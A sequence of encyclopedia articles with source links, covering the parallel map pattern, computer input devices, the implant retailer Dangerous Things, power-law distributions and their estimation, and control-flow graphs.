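In Python, for instance, the map pattern is available directly through executor pools; a minimal sketch (thread-based here for simplicity, though in CPython true CPU parallelism for this kind of work would require a process pool):

```python
from concurrent.futures import ThreadPoolExecutor

def elemental(x):
    """The elemental function: an independent per-item operation,
    requiring no communication with other items."""
    return x * x

with ThreadPoolExecutor(max_workers=4) as pool:
    # map applies `elemental` to each item, potentially in parallel;
    # leaving the `with` block acts as the implicit join/barrier.
    squares = list(pool.map(elemental, range(8)))

# squares == [0, 1, 4, 9, 16, 25, 36, 49]
```

Note that `Executor.map` preserves input order in its results, so the parallel version is a drop-in replacement for the sequential `map`.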
|
https://en.wikipedia.org/wiki/Map_(parallel_pattern)
|
In computing, an input device is a piece of equipment used to provide data and control signals to an information processing system, such as a computer or information appliance. Examples of input devices include keyboards, computer mice, scanners, cameras, joysticks, and microphones.
Input devices can be categorized based on:
A keyboard is a human interface device which is represented as a matrix of buttons. Each button, or key, can be used to either input an alphanumeric character to a computer, or to call upon a particular function of the computer. It acts as the main text entry interface for most users.[1]
Keyboards are available in many form factors, depending on the use case. Standard keyboards can be categorized by their size and number of keys, and by the type of switch they employ. Other keyboards cater to specific use cases, such as a numeric keypad or a keyer.
Desktop keyboards are typically large, often have full key travel distance, and include features such as multimedia keys and a numeric keypad. Keyboards on laptops and tablets typically compromise on comfort to achieve a thin profile.
There are various switch technologies used in modern keyboards, such as mechanical switches (which use springs), scissor switches (usually found on laptop keyboards), or a membrane.
Other keyboards do not have physical keys, such as a virtual keyboard or a projection keyboard.
A pointing device allows a user to input spatial data to a computer. It is commonly used as a simple and intuitive way to select items on a computer screen on a graphical user interface (GUI), either by moving a mouse pointer, or, in the case of a touch screen, by physically touching the item on screen. Common pointing devices include mice, touchpads, and touch screens.[2]
Whereas mice operate by detecting their displacement on a surface, analog devices, such as 3D mice, joysticks, or pointing sticks, function by reporting their angle of deflection.
Pointing devices can be classified based on:
Direct input is almost necessarily absolute, but indirect input may be either absolute or relative. For example, digitizing graphics tablets that do not have an embedded screen involve indirect input and sense absolute positions and are often run in an absolute input mode, but they may also be set up to simulate a relative input mode like that of a touchpad, where the stylus or puck can be lifted and repositioned. Embedded LCD tablets, which are also referred to as graphics tablet monitors, are an extension of digitizing graphics tablets. They enable users to see the real-time position via the screen while in use.
A sensor is an input device which produces data based on physical properties.[4]
Sensors are commonly found in mobile devices to detect their physical orientation and acceleration, but may also be found in desktop computers in the form of a thermometer used to monitor system temperature.
Some sensors can be built with MEMS, which allows them to be microscopic in size.
Some devices allow many continuous degrees of freedom as input. These can be used as pointing devices, but are generally used in ways that do not involve pointing to a location in space, such as controlling a camera angle in 3D applications. These kinds of devices are typically used in virtual reality systems (CAVEs), where input that registers six degrees of freedom is required.
Input devices, such as buttons and joysticks, can be combined on a single physical device that could be thought of as a composite device. Many gaming devices have controllers like this. Technically mice are composite devices, as they both track movement and provide buttons for clicking, but composite devices are generally considered to have more than two different forms of input.
Video input devices are used to digitize images or video from the outside world into the computer. The information can be stored in a multitude of formats depending on the user's requirement.
Many video input devices use a camera sensor.
Voice input devices are used to capture sound. In some cases, an audio output device can be used as an input device, in order to capture produced sound. Audio input devices allow a user to send audio information to a computer for processing, recording, or carrying out commands. Devices such as microphones allow users to speak to the computer in order to record a voice message or navigate software. Aside from recording, audio input devices are also used with speech recognition software.
Punched cards and punched tapes were used often in the 20th century. A punched hole represented a one; its absence represented a zero. A mechanical or optical reader was used to input a punched card or tape.
|
https://en.wikipedia.org/wiki/Input_device
|
Dangerous Things[1] is a Seattle-based cybernetic microchip biohacking implant retailer formed in 2013 by Amal Graafstra,[2] following a crowdfunding campaign.[3]
Dangerous Things built the first personal, publicly available implantable NFC-compliant transponder in 2013.[4] In September 2020, Dangerous Things began another successful crowdfunding campaign to realize the Titan, the world's first titanium-encased, fully biocompatible sensing magnet.
|
https://en.wikipedia.org/wiki/Dangerous_Things
|
In statistics, a power law is a functional relationship between two quantities, where a relative change in one quantity results in a relative change in the other quantity proportional to the change raised to a constant exponent: one quantity varies as a power of another. The change is independent of the initial size of those quantities.
For instance, the area of a square has a power-law relationship with the length of its side: if the length is doubled, the area is multiplied by 2² = 4, while if the length is tripled, the area is multiplied by 3² = 9, and so on.[1]
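This quadratic scaling is easy to check numerically; a minimal Python sketch (the function name `area` is just illustrative):

```python
def area(side):
    """Area of a square: a power law in the side length with exponent 2."""
    return side ** 2

# Doubling the side multiplies the area by 2^2 = 4;
# tripling it multiplies the area by 3^2 = 9.
assert area(2 * 5) == 4 * area(5)
assert area(3 * 5) == 9 * area(5)
```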
The distributions of a wide variety of physical, biological, and human-made phenomena approximately follow a power law over a wide range of magnitudes: these include the sizes of craters on the moon and of solar flares,[2] cloud sizes,[3] the foraging pattern of various species,[4] the sizes of activity patterns of neuronal populations,[5] the frequencies of words in most languages, frequencies of family names, the species richness in clades of organisms,[6] the sizes of power outages, volcanic eruptions,[7] human judgments of stimulus intensity,[8][9] and many other quantities.[10] Empirical distributions can only fit a power law for a limited range of values, because a pure power law would allow for arbitrarily large or small values. Acoustic attenuation follows frequency power laws within wide frequency bands for many complex media. Allometric scaling laws for relationships between biological variables are among the best-known power-law functions in nature.
The power-law model does not obey the usual requirement of statistical completeness: probability bounds, the suspected cause of the bending and/or flattening typically seen in the high- and low-frequency segments of empirical plots, have no parametric counterpart in the standard model.[11]
One attribute of power laws is their scale invariance. Given a relation f(x) = a x^(−k), scaling the argument x by a constant factor c causes only a proportionate scaling of the function itself. That is,

f(cx) = a (cx)^(−k) = c^(−k) f(x) ∝ f(x),
where ∝ denotes direct proportionality. That is, scaling by a constant c simply multiplies the original power-law relation by the constant c^(−k). Thus, it follows that all power laws with a particular scaling exponent are equivalent up to constant factors, since each is simply a scaled version of the others. This behavior is what produces the linear relationship when logarithms are taken of both f(x) and x, and the straight line on the log–log plot is often called the signature of a power law. With real data, such straightness is a necessary, but not sufficient, condition for the data following a power-law relation. In fact, there are many ways to generate finite amounts of data that mimic this signature behavior, but, in their asymptotic limit, are not true power laws.[citation needed] Thus, accurately fitting and validating power-law models is an active area of research in statistics; see below.
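Both the scale invariance and the log–log signature can be verified numerically; a small sketch (the constants a, c, and k are arbitrary choices for illustration):

```python
import math

def f(x, a=3.0, k=1.7):
    """Power law f(x) = a * x^(-k)."""
    return a * x ** (-k)

c, k = 5.0, 1.7

# Scale invariance: f(c*x) = c^(-k) * f(x), i.e. rescaling the argument
# only rescales the function by a constant factor.
for x in (0.5, 1.0, 10.0):
    assert math.isclose(f(c * x), c ** (-k) * f(x))

# Log-log signature: a straight line with slope -k.
x1, x2 = 2.0, 20.0
slope = (math.log(f(x2)) - math.log(f(x1))) / (math.log(x2) - math.log(x1))
assert math.isclose(slope, -k)
```

As the text notes, with empirical data such straightness is necessary but not sufficient evidence of a power law.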
A power law x^(−k) has a well-defined mean over x ∈ [1, ∞) only if k > 2, and it has a finite variance only if k > 3; most identified power laws in nature have exponents such that the mean is well-defined but the variance is not, implying they are capable of black swan behavior.[2] This can be seen in the following thought experiment:[12] imagine a room with your friends and estimate the average monthly income in the room. Now imagine the world's richest person entering the room, with a monthly income of about 1 billion US$. What happens to the average income in the room? Income is distributed according to a power law known as the Pareto distribution (for example, the net worth of Americans is distributed according to a power law with an exponent of 2).
On the one hand, this makes it incorrect to apply traditional statistics that are based on variance and standard deviation (such as regression analysis).[13] On the other hand, this also allows for cost-efficient interventions.[12] For example, given that car exhaust is distributed according to a power law among cars (very few cars contribute to most contamination), it would be sufficient to eliminate those very few cars from the road to reduce total exhaust substantially.[14]
The median does exist, however: for a power law x^(−k) with exponent k > 1, it takes the value 2^(1/(k−1)) x_min, where x_min is the minimum value for which the power law holds.[2]
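The median formula follows directly from the survival function P(X > x) = (x/x_min)^(−(k−1)) of the normalized power law; a quick check in Python (the parameter values are arbitrary):

```python
import math

def survival(x, k, xmin):
    """P(X > x) for a power-law density p(x) ∝ x^(-k) on [xmin, ∞), k > 1."""
    return (x / xmin) ** (-(k - 1))

# The median m satisfies P(X > m) = 1/2, which gives m = 2^(1/(k-1)) * xmin.
k, xmin = 2.3, 1.5
median = 2 ** (1 / (k - 1)) * xmin
assert math.isclose(survival(median, k, xmin), 0.5)
```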
The equivalence of power laws with a particular scaling exponent can have a deeper origin in the dynamical processes that generate the power-law relation. In physics, for example, phase transitions in thermodynamic systems are associated with the emergence of power-law distributions of certain quantities, whose exponents are referred to as the critical exponents of the system. Diverse systems with the same critical exponents—that is, which display identical scaling behaviour as they approach criticality—can be shown, via renormalization group theory, to share the same fundamental dynamics. For instance, the behavior of water and CO₂ at their boiling points falls in the same universality class because they have identical critical exponents.[citation needed][clarification needed] In fact, almost all material phase transitions are described by a small set of universality classes. Similar observations have been made, though not as comprehensively, for various self-organized critical systems, where the critical point of the system is an attractor. Formally, this sharing of dynamics is referred to as universality, and systems with precisely the same critical exponents are said to belong to the same universality class.
Scientific interest in power-law relations stems partly from the ease with which certain general classes of mechanisms generate them.[15] The demonstration of a power-law relation in some data can point to specific kinds of mechanisms that might underlie the natural phenomenon in question, and can indicate a deep connection with other, seemingly unrelated systems;[16] see also universality above. The ubiquity of power-law relations in physics is partly due to dimensional constraints, while in complex systems, power laws are often thought to be signatures of hierarchy or of specific stochastic processes. A few notable examples of power laws are Pareto's law of income distribution, the structural self-similarity of fractals, scaling laws in biological systems, and scaling laws in cities. Research on the origins of power-law relations, and efforts to observe and validate them in the real world, is an active topic of research in many fields of science, including physics, computer science, linguistics, geophysics, neuroscience, systematics, sociology, economics and more.
However, much of the recent interest in power laws comes from the study of probability distributions: the distributions of a wide variety of quantities seem to follow the power-law form, at least in their upper tail (large events). The behavior of these large events connects these quantities to the study of the theory of large deviations (also called extreme value theory), which considers the frequency of extremely rare events like stock market crashes and large natural disasters. It is primarily in the study of statistical distributions that the name "power law" is used.
In empirical contexts, an approximation to a power law o(x^k) often includes a deviation term ε, which can represent uncertainty in the observed values (perhaps measurement or sampling errors) or provide a simple way for observations to deviate from the power-law function (perhaps for stochastic reasons):

y = a x^k + ε.
Mathematically, a strict power law cannot be a probability distribution, but a distribution that is a truncated power function is possible: p(x) = C x^(−α) for x > x_min, where the exponent α (Greek letter alpha, not to be confused with the scaling factor a used above) is greater than 1 (otherwise the tail has infinite area), the minimum value x_min is needed (otherwise the distribution has infinite area as x approaches 0), and the constant C is a scaling factor that ensures the total area is 1, as required by a probability distribution. More often one uses an asymptotic power law – one that is only true in the limit; see power-law probability distributions below for details. Typically the exponent falls in the range 2 < α < 3, though not always.[10]
More than a hundred power-law distributions have been identified in physics (e.g. sandpile avalanches), biology (e.g. species extinction and body mass), and the social sciences (e.g. city sizes and income).[17] Among them are:
A broken power law is a piecewise function, consisting of two or more power laws, combined with a threshold. For example, with two power laws:[49]

f(x) ∝ x^(−α₁) for x < x_th,
f(x) ∝ x_th^(α₂−α₁) x^(−α₂) for x > x_th.
The pieces of a broken power law can be smoothly spliced together to construct a smoothly broken power law.
There are different possible ways to splice together power laws. One example is the following:[50]

ln(y/y₀ + a) = c₀ ln(x/x₀) + Σ_{i=1}^{n} ((c_i − c_{i−1})/f_i) ln(1 + (x/x_i)^{f_i}),

where 0 < x₀ < x₁ < ⋯ < x_n.
When the function is plotted as a log–log plot with horizontal axis ln x and vertical axis ln(y/y₀ + a), the plot is composed of n + 1 linear segments with slopes c₀, c₁, ..., c_n, separated at x = x₁, ..., x_n and smoothly spliced together. The size of f_i determines the sharpness of the splicing between segments i − 1 and i.
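A direct implementation of the splicing formula, as a hedged sketch (the function and parameter names are ours, not from the source):

```python
import math

def smoothly_broken(x, y0, a, x0, c, xs, fs):
    """Smoothly broken power law: solves
    ln(y/y0 + a) = c0*ln(x/x0) + sum_i ((c_i - c_{i-1})/f_i)*ln(1 + (x/x_i)^f_i)
    for y.  c = [c0..cn] are the log-log slopes, xs = [x1..xn] the break
    positions, fs = [f1..fn] the splice sharpnesses."""
    log_term = c[0] * math.log(x / x0)
    for i in range(1, len(c)):
        log_term += (c[i] - c[i - 1]) / fs[i - 1] * math.log(
            1 + (x / xs[i - 1]) ** fs[i - 1]
        )
    return y0 * (math.exp(log_term) - a)

# With a = 0, slopes [-1, -2] and a single break at x = 100, the log-log
# slope is about -1 well below the break and about -2 well above it.
y0, a, x0, c, xs, fs = 1.0, 0.0, 1.0, [-1.0, -2.0], [100.0], [4.0]

def loglog_slope(xa, xb):
    ya = smoothly_broken(xa, y0, a, x0, c, xs, fs)
    yb = smoothly_broken(xb, y0, a, x0, c, xs, fs)
    return (math.log(yb) - math.log(ya)) / (math.log(xb) - math.log(xa))

assert abs(loglog_slope(0.01, 0.1) + 1.0) < 1e-6
assert abs(loglog_slope(1e4, 1e5) + 2.0) < 1e-6
```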
A power law with an exponential cutoff is simply a power law multiplied by an exponential function:[10]

f(x) ∝ x^(−α) e^(−λx).
In a looser sense, a power-law probability distribution is a distribution whose density function (or mass function in the discrete case) has the form, for large values of x,[52]

p(x) ∝ L(x) x^(−α),
where α > 1, and L(x) is a slowly varying function, which is any function that satisfies lim_{x→∞} L(rx)/L(x) = 1 for any positive factor r. This property of L(x) follows directly from the requirement that p(x) be asymptotically scale invariant; thus, the form of L(x) only controls the shape and finite extent of the lower tail. For instance, if L(x) is the constant function, then we have a power law that holds for all values of x. In many cases, it is convenient to assume a lower bound x_min from which the law holds. Combining these two cases, and where x is a continuous variable, the power law has the form of the Pareto distribution

p(x) = ((α − 1)/x_min) (x/x_min)^(−α) for x ≥ x_min,
where the prefactor (α − 1)/x_min is the normalizing constant. We can now consider several properties of this distribution. For instance, its moments are given by

⟨x^m⟩ = ∫_{x_min}^∞ x^m p(x) dx = ((α − 1)/(α − 1 − m)) x_min^m,
which is only well defined for m < α − 1. That is, all moments m ≥ α − 1 diverge: when α ≤ 2, the average and all higher-order moments are infinite; when 2 < α < 3, the mean exists, but the variance and higher-order moments are infinite, and so on. For finite-size samples drawn from such a distribution, this behavior implies that the central moment estimators (like the mean and the variance) for diverging moments will never converge – as more data is accumulated, they continue to grow. These power-law probability distributions are also called Pareto-type distributions, distributions with Pareto tails, or distributions with regularly varying tails.
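The moment formula ⟨x^m⟩ = ((α − 1)/(α − 1 − m)) x_min^m for m < α − 1, and the divergence above that threshold, can be illustrated by numerical integration (a sketch; the cutoffs and step count are arbitrary choices):

```python
import math

def moment(m, alpha, xmin=1.0, cutoff=1e6, steps=200_000):
    """Trapezoid-rule integral of x^m * p(x) for the Pareto density
    p(x) = (alpha-1)/xmin * (x/xmin)^(-alpha), up to a finite cutoff,
    using the substitution u = ln(x)."""
    a, b = math.log(xmin), math.log(cutoff)
    h = (b - a) / steps
    total = 0.0
    for i in range(steps + 1):
        x = math.exp(a + i * h)
        p = (alpha - 1) / xmin * (x / xmin) ** (-alpha)
        w = 0.5 if i in (0, steps) else 1.0
        total += w * x ** m * p * x  # trailing x is the Jacobian dx = x du
    return total * h

alpha = 2.5
# m = 1 < alpha - 1: the mean converges, to (alpha-1)/(alpha-1-1) = 3.
assert abs(moment(1, alpha) - 3.0) < 0.01
# m = 2 >= alpha - 1: the integral keeps growing as the cutoff increases.
assert moment(2, alpha, cutoff=1e8) > 10 * moment(2, alpha, cutoff=1e4)
```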
A modification, which does not satisfy the general form above, with an exponential cutoff,[10] is

p(x) ∝ L(x) x^(−α) e^(−λx).
In this distribution, the exponential decay term e^(−λx) eventually overwhelms the power-law behavior at very large values of x. This distribution does not scale[further explanation needed] and is thus not asymptotically a power law; however, it does approximately scale over a finite region before the cutoff. The pure form above is a subset of this family, with λ = 0. This distribution is a common alternative to the asymptotic power-law distribution because it naturally captures finite-size effects.
The Tweedie distributions are a family of statistical models characterized by closure under additive and reproductive convolution as well as under scale transformation. Consequently, these models all express a power-law relationship between the variance and the mean. These models have a fundamental role as foci of mathematical convergence similar to the role that the normal distribution has as a focus in the central limit theorem. This convergence effect explains why the variance-to-mean power law manifests so widely in natural processes, as with Taylor's law in ecology and with fluctuation scaling[53] in physics. It can also be shown that this variance-to-mean power law, when demonstrated by the method of expanding bins, implies the presence of 1/f noise and that 1/f noise can arise as a consequence of this Tweedie convergence effect.[54]
Although more sophisticated and robust methods have been proposed, the most frequently used graphical methods of identifying power-law probability distributions using random samples are Pareto quantile-quantile plots (or Pareto Q–Q plots),[citation needed] mean residual life plots[55][56] and log–log plots. Another, more robust graphical method uses bundles of residual quantile functions.[57] (Keep in mind that power-law distributions are also called Pareto-type distributions.) It is assumed here that a random sample is obtained from a probability distribution, and that we want to know if the tail of the distribution follows a power law (in other words, we want to know if the distribution has a "Pareto tail"). Here, the random sample is called "the data".
Pareto Q–Q plots compare the quantiles of the log-transformed data to the corresponding quantiles of an exponential distribution with mean 1 (or to the quantiles of a standard Pareto distribution) by plotting the former versus the latter. If the resultant scatterplot suggests that the plotted points asymptotically converge to a straight line, then a power-law distribution should be suspected. A limitation of Pareto Q–Q plots is that they behave poorly when the tail index α (also called the Pareto index) is close to 0, because Pareto Q–Q plots are not designed to identify distributions with slowly varying tails.[57]
On the other hand, in its version for identifying power-law probability distributions, the mean residual life plot consists of first log-transforming the data, and then plotting the average of those log-transformed data that are higher than the i-th order statistic versus the i-th order statistic, for i = 1, ..., n, where n is the size of the random sample. If the resultant scatterplot suggests that the plotted points tend to stabilize about a horizontal straight line, then a power-law distribution should be suspected. Since the mean residual life plot is very sensitive to outliers (it is not robust), it usually produces plots that are difficult to interpret; for this reason, such plots are usually called Hill horror plots.[58]
Log–log plots are an alternative way of graphically examining the tail of a distribution using a random sample. Taking the logarithm of a power law of the form f(x) = a x^k results in:[59]

log f(x) = log a + k log x,
which forms a straight line with slope k on a log–log scale. Caution has to be exercised, however, as a log–log plot is necessary but insufficient evidence for a power-law relationship: many non-power-law distributions will also appear as straight lines on a log–log plot.[10][60] This method consists of plotting the logarithm of an estimator of the probability that a particular number of the distribution occurs versus the logarithm of that particular number. Usually, this estimator is the proportion of times that the number occurs in the data set. If the points in the plot tend to converge to a straight line for large numbers in the x axis, then the researcher concludes that the distribution has a power-law tail. Examples of the application of these types of plot have been published.[61] A disadvantage of these plots is that, in order for them to provide reliable results, they require huge amounts of data. In addition, they are appropriate only for discrete (or grouped) data.
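The straight-line behavior can be seen by fitting a least-squares slope to log-transformed points of an exact power law (a sketch with arbitrary values; as noted above, straightness alone does not prove a power law):

```python
import math

# Exact power-law data: y = a * x^k, so log y = log a + k * log x.
a, k = 2.5, -1.3
xs = [1.0, 2.0, 5.0, 10.0, 50.0, 100.0]
lx = [math.log(x) for x in xs]
ly = [math.log(a * x ** k) for x in xs]

# Ordinary least-squares slope of log y against log x recovers k.
n = len(xs)
mx, my = sum(lx) / n, sum(ly) / n
slope = sum((u - mx) * (v - my) for u, v in zip(lx, ly)) / sum(
    (u - mx) ** 2 for u in lx
)
assert abs(slope - k) < 1e-9
```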
Another graphical method for the identification of power-law probability distributions using random samples has been proposed.[57] This methodology consists of plotting a bundle for the log-transformed sample. Originally proposed as a tool to explore the existence of moments and the moment generating function using random samples, the bundle methodology is based on residual quantile functions (RQFs), also called residual percentile functions,[62][63][64][65][66][67][68] which provide a full characterization of the tail behavior of many well-known probability distributions, including power-law distributions, distributions with other types of heavy tails, and even non-heavy-tailed distributions. Bundle plots do not have the disadvantages of Pareto Q–Q plots, mean residual life plots and log–log plots mentioned above (they are robust to outliers, allow visually identifying power laws with small values of α, and do not demand the collection of much data).[citation needed] In addition, other types of tail behavior can be identified using bundle plots.
In general, power-law distributions are plotted on doubly logarithmic axes, which emphasizes the upper tail region. The most convenient way to do this is via the (complementary) cumulative distribution (ccdf), that is, the survival function P(x) = Pr(X > x), which for the Pareto form above is

P(x) = (x/x_min)^(−(α−1)).
The ccdf is also a power-law function, but with a smaller scaling exponent. For data, an equivalent form is the rank-frequency approach, in which we first sort the n observed values in ascending order, and plot them against the vector [1, (n−1)/n, (n−2)/n, ..., 1/n].
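A minimal sketch of the rank-frequency construction (the function name is ours):

```python
def rank_frequency(data):
    """Pair each sorted value with the empirical survival fraction
    P(X >= x): the i-th smallest of n values is paired with (n - i)/n,
    producing the vector [1, (n-1)/n, ..., 1/n] described above."""
    n = len(data)
    return [(x, (n - i) / n) for i, x in enumerate(sorted(data))]

pairs = rank_frequency([4.0, 1.0, 3.0, 2.0])
assert pairs == [(1.0, 1.0), (2.0, 0.75), (3.0, 0.5), (4.0, 0.25)]
```

Plotting these pairs on doubly logarithmic axes gives the empirical survival function discussed above.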
Although it can be convenient to log-bin the data, or otherwise smooth the probability density (mass) function directly, these methods introduce an implicit bias in the representation of the data, and thus should be avoided.[10][69] The survival function, on the other hand, is more robust to (but not without) such biases in the data and preserves the linear signature on doubly logarithmic axes. Though a survival-function representation is favored over that of the pdf when fitting a power law to the data with the linear least-squares method, it is not devoid of mathematical inaccuracy. Thus, when estimating exponents of a power-law distribution, the maximum likelihood estimator is recommended.
There are many ways of estimating the value of the scaling exponent for a power-law tail, however not all of them yield unbiased and consistent answers. Some of the most reliable techniques are often based on the method of maximum likelihood. Alternative methods are often based on making a linear regression on either the log–log probability, the log–log cumulative distribution function, or on log-binned data, but these approaches should be avoided as they can all lead to highly biased estimates of the scaling exponent.[10]
For real-valued, independent and identically distributed data, we fit a power-law distribution of the form

p(x) = ((α − 1)/x_min) (x/x_min)^(−α)
to the data x ≥ x_min, where the coefficient (α − 1)/x_min is included to ensure that the distribution is normalized. Given a choice for x_min, the log-likelihood function becomes:

ln L(α) = n ln(α − 1) − n ln x_min − α Σ_{i=1}^{n} ln(x_i / x_min).
The maximum of this likelihood is found by differentiating with respect to the parameter α and setting the result equal to zero. Upon rearrangement, this yields the estimator equation:

α̂ = 1 + n [ Σ_{i=1}^{n} ln(x_i / x_min) ]^(−1),
where {x_i} are the n data points x_i ≥ x_min.[2][70] This estimator exhibits a small finite-sample-size bias of order O(n^(−1)), which is small when n > 100. Further, the standard error of the estimate is σ = (α̂ − 1)/√n + O(n^(−1)). This estimator is equivalent to the popular[citation needed] Hill estimator from quantitative finance and extreme value theory.[citation needed]
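The continuous estimator and its standard error are straightforward to implement (a sketch; the function name is ours):

```python
import math

def fit_alpha(data, xmin):
    """Continuous maximum-likelihood (Hill-type) estimate of the power-law
    exponent: alpha_hat = 1 + n / sum(ln(x_i / xmin)), with standard
    error sigma = (alpha_hat - 1) / sqrt(n)."""
    xs = [x for x in data if x >= xmin]
    n = len(xs)
    alpha_hat = 1 + n / sum(math.log(x / xmin) for x in xs)
    sigma = (alpha_hat - 1) / math.sqrt(n)
    return alpha_hat, sigma

# If every observation sits at x = e * xmin, each log-ratio is exactly 1,
# so alpha_hat = 1 + n/n = 2 and sigma = 1/sqrt(n).
alpha_hat, sigma = fit_alpha([math.e] * 4, xmin=1.0)
assert math.isclose(alpha_hat, 2.0)
assert math.isclose(sigma, 0.5)
```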
For a set of n integer-valued data points {x_i}, again where each x_i ≥ x_min, the maximum likelihood exponent is the solution to the transcendental equation

ζ′(α̂, x_min) / ζ(α̂, x_min) = −(1/n) Σ_{i=1}^{n} ln x_i,
where ζ(α, x_min) is the incomplete zeta function. The uncertainty in this estimate follows the same formula as for the continuous equation. However, the two equations for α̂ are not equivalent, and the continuous version should not be applied to discrete data, nor vice versa.
Further, both of these estimators require the choice of x_min. For functions with a non-trivial L(x) function, choosing x_min too small produces a significant bias in α̂, while choosing it too large increases the uncertainty in α̂ and reduces the statistical power of our model. In general, the best choice of x_min depends strongly on the particular form of the lower tail, represented by L(x) above.
More about these methods, and the conditions under which they can be used, can be found in [10]. Further, this comprehensive review article provides usable code (Matlab, Python, R and C++) for estimation and testing routines for power-law distributions.
Another method for the estimation of the power-law exponent, which does not assume independent and identically distributed (iid) data, uses the minimization of the Kolmogorov–Smirnov statistic, D, between the cumulative distribution functions of the data and the power law:

α̂ = argmin_α D_α,

with

D_α = max_x | P_emp(x) − P_α(x) |,

where P_emp(x) and P_α(x) denote the CDFs of the data and the power law with exponent α, respectively. As this method does not assume iid data, it provides an alternative way to determine the power-law exponent for data sets in which the temporal correlation can not be ignored.[5]
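A grid-search sketch of this KS-minimization (the names and the search grid are our illustrative choices):

```python
def ks_fit(data, xmin, alphas):
    """Return the exponent from `alphas` minimizing the KS distance between
    the empirical CDF and the power-law CDF F(x) = 1 - (x/xmin)^(1-alpha)."""
    xs = sorted(x for x in data if x >= xmin)
    n = len(xs)
    best_alpha, best_d = None, float("inf")
    for alpha in alphas:
        d = 0.0
        for i, x in enumerate(xs):
            model = 1 - (x / xmin) ** (1 - alpha)
            # compare with the empirical CDF on both sides of its step at x
            d = max(d, abs(model - i / n), abs(model - (i + 1) / n))
        if d < best_d:
            best_alpha, best_d = alpha, d
    return best_alpha, best_d

# Synthetic data placed at the exact quantiles of an alpha = 2.5 power law:
true_alpha, xmin, n = 2.5, 1.0, 1000
data = [xmin * (1 - (i + 0.5) / n) ** (-1 / (true_alpha - 1)) for i in range(n)]
alpha_hat, d = ks_fit(data, xmin, [1.5 + 0.01 * j for j in range(201)])
assert abs(alpha_hat - true_alpha) < 0.05
```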
This criterion[71] can be applied for the estimation of the power-law exponent in the case of scale-free distributions, and provides a more convergent estimate than the maximum likelihood method. It has been applied to study probability distributions of fracture apertures. In some contexts the probability distribution is described not by the cumulative distribution function but by the cumulative frequency of a property X, defined as the number of elements per meter (or area unit, second, etc.) for which X > x applies, where x is a variable real number. As an example,[citation needed] the cumulative distribution of the fracture aperture, X, for a sample of N elements is defined as the number of fractures per meter having an aperture greater than x. Use of cumulative frequency has some advantages, e.g. it allows one to put on the same diagram data gathered from sample lines of different lengths at different scales (e.g. from outcrop and from microscope).
Although power-law relations are attractive for many theoretical reasons, demonstrating that data does indeed follow a power-law relation requires more than simply fitting a particular model to the data.[34] This is important for understanding the mechanism that gives rise to the distribution: superficially similar distributions may arise for significantly different reasons, and different models yield different predictions, such as extrapolation.
For example, log-normal distributions are often mistaken for power-law distributions:[72] a data set drawn from a lognormal distribution will be approximately linear for large values (corresponding to the upper tail of the lognormal being close to a power law)[clarification needed], but for small values the lognormal will drop off significantly (bowing down), corresponding to the lower tail of the lognormal being small (there are very few small values, rather than many small values in a power law).[citation needed]
For example, Gibrat's law about proportional growth processes produces distributions that are lognormal, although their log–log plots look linear over a limited range. An explanation is that although the logarithm of the lognormal density function is quadratic in log(x), yielding a "bowed" shape in a log–log plot, if the quadratic term is small relative to the linear term then the result can appear almost linear; the lognormal behavior is only visible when the quadratic term dominates, which may require significantly more data. Therefore, a log–log plot that is slightly "bowed" downwards can reflect a log-normal distribution – not a power law.
In general, many alternative functional forms can appear to follow a power-law form to some extent.[73] Stumpf & Porter (2012) proposed plotting the empirical cumulative distribution function in the log–log domain and claimed that a candidate power law should cover at least two orders of magnitude.[74] Also, researchers usually have to face the problem of deciding whether or not a real-world probability distribution follows a power law. As a solution to this problem, Diaz[57] proposed a graphical methodology based on random samples that allows visually discerning between different types of tail behavior. This methodology uses bundles of residual quantile functions, also called percentile residual life functions, which characterize many different types of distribution tails, including both heavy and non-heavy tails. However, Stumpf & Porter (2012) claimed the need for both a statistical and a theoretical background in order to support a power law in the underlying mechanism driving the data-generating process.[74]
One method to validate a power-law relation tests many orthogonal predictions of a particular generative mechanism against data. Simply fitting a power-law relation to a particular kind of data is not considered a rational approach. As such, the validation of power-law claims remains a very active field of research in many areas of modern science.[10]
|
https://en.wikipedia.org/wiki/Power_law
|
In computer science, a control-flow graph (CFG) is a representation, using graph notation, of all paths that might be traversed through a program during its execution. The control-flow graph was conceived by Frances E. Allen,[1] who noted that Reese T. Prosser used boolean connectivity matrices for flow analysis before.[2]
The CFG is essential to many compiler optimizations and static-analysis tools.
In a control-flow graph each node in the graph represents a basic block, i.e. a straight-line sequence of code with a single entry point and a single exit point, where no branches or jumps occur within the block. Basic blocks start at jump targets and end with jumps or branch instructions. Directed edges are used to represent jumps in the control flow. There are, in most presentations, two specially designated blocks: the entry block, through which control enters into the flow graph, and the exit block, through which all control flow leaves.[3]
Because of its construction procedure, in a CFG, every edge A→B has the property that A has more than one outgoing edge, or B has more than one incoming edge (or both).
The CFG can thus be obtained, at least conceptually, by starting from the program's (full) flow graph—i.e. the graph in which every node represents an individual instruction—and performing an edge contraction for every edge that falsifies the predicate above, i.e. contracting every edge whose source has a single exit and whose destination has a single entry. This contraction-based algorithm is of no practical importance, except as a visualization aid for understanding the CFG construction, because the CFG can be more efficiently constructed directly from the program by scanning it for basic blocks.[4]
Consider the following fragment of code (statements are illustrative; the line numbers and block boundaries are what matter):

0: (A) t0 = read_num
1: (A) if t0 mod 2 == 1 goto 4
2: (B) print t0 + " is even."
3: (B) goto 5
4: (C) print t0 + " is odd."
5: (D) end program

In the above, we have 4 basic blocks: A from 0 to 1, B from 2 to 3, C at 4 and D at 5. In particular, in this case, A is the "entry block", D the "exit block" and lines 4 and 5 are jump targets. A graph for this fragment has edges from A to B, A to C, B to D and C to D.
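The fragment's CFG can be written down directly as an adjacency list; a small Python sketch (node names follow the block labels above):

```python
# Basic blocks as nodes; directed edges are possible transfers of control.
cfg = {
    "A": ["B", "C"],  # conditional branch at the end of the entry block
    "B": ["D"],       # unconditional jump past C
    "C": ["D"],       # falls through to the exit block
    "D": [],          # exit block
}

def reachable(graph, entry):
    """Set of blocks reachable from the entry block (iterative DFS)."""
    seen, stack = set(), [entry]
    while stack:
        node = stack.pop()
        if node not in seen:
            seen.add(node)
            stack.extend(graph[node])
    return seen

# Every block is reachable from the entry block A.
assert reachable(cfg, "A") == {"A", "B", "C", "D"}
```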
Reachability is a graph property useful in optimization.
If a subgraph is not reachable from the subgraph containing the entry block, that subgraph is unreachable during any execution, and so is unreachable code; under normal conditions it can be safely removed.
If the exit block is unreachable from the entry block, an infinite loop may exist. Not all infinite loops are detectable; see Halting problem. A halting order may also exist there.
